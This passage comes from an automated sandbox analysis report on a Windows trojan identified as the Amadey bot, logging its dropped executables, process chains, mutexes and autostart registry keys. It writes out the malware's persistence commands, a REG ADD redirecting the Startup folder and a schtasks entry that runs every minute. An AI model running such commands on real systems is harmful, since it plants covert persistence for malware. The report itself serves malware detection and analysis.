              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 4624 /t /f
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess created: C:\Users\user\AppData\Local\Temp\a.exe 'C:\Users\user\AppData\Local\Temp\a.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\a.exeProcess created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /FJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nhJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 6268 /t /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 3184 /t /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe TaskKill /pid 4624 /t /f
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe 'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\mvoElayshk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
              Source: C:\Users\user\Desktop\mvoElayshk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mvoElayshk.exe.logJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe TaskList /fo CSV /nh
              Source: C:\Users\user\Desktop\mvoElayshk.exeFile created: C:\Users\user\AppData\Local\Temp\a.exeJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@100/16@1/3
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00409332 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,13_2_00409332
              Source: C:\Users\user\Desktop\mvoElayshk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_004023DF GetDiskFreeSpaceExW,SendMessageW,13_2_004023DF
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00409684 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,13_2_00409684
              Source: C:\Users\user\Desktop\mvoElayshk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_01
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_00403908 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,13_2_00403908
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: mvoElayshk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: mvoElayshk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: mvoElayshk.exe
              Source: C:\Users\user\Desktop\mvoElayshk.exeCode function: 0_2_00291C42 push rcx; ret 0_2_00291C79
              Source: C:\Users\user\AppData\Local\Temp\a.exeCode function: 3_2_01010626 push ecx; ret 3_2_01010639
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F10626 push ecx; ret 5_2_00F10639
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F03DAE push cs; iretd 11_2_00F03DAF
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 11_2_00F10626 push ecx; ret 11_2_00F10639
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041C1C0 push eax; ret 13_2_0041C1EE
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 13_2_0041BEF0 push ecx; mov dword ptr [esp], ecx13_2_0041BEF1
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041C1C0 push eax; ret 16_2_0041C1EE
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeCode function: 16_2_0041BEF0 push ecx; mov dword ptr [esp], ecx16_2_0041BEF1
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeCode function: 29_2_02536726 push es; retf 29_2_02536745
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeCode function: 5_2_00F0C0A0 Sleep,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,GetUserNameW,GetComputerNameExW,5_2_00F0C0A0

              Persistence and Installation Behavior:

              barindex
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933021893.000000000137E000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.927044420.0000000001359000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rnyuf.exe PID: 6908, type: MEMORYSTR
              Source: C:\Users\user\Desktop\mvoElayshk.exeFile created: C:\Users\user\AppData\Local\Temp\a.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\1sb1iwyem7[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile created: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\5mgcqk6jl[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeFile created: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\a.exeFile created: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeJump to dropped file

              Boot Survival:

              barindex
              Creates multiple autostart registry keysShow sources
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5mgcqk6jl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1sb1iwyem7.exeJump to behavior
              Creates an undocumented autostart registry key Show sources
              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /F
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1sb1iwyem7.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1sb1iwyem7.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5mgcqk6jl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5mgcqk6jl.exeJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mvoElayshk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\mvoElayshk.exe TID: 6280Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe TID: 6892Thread sleep time: -150000s >= -30000sJump to behavior
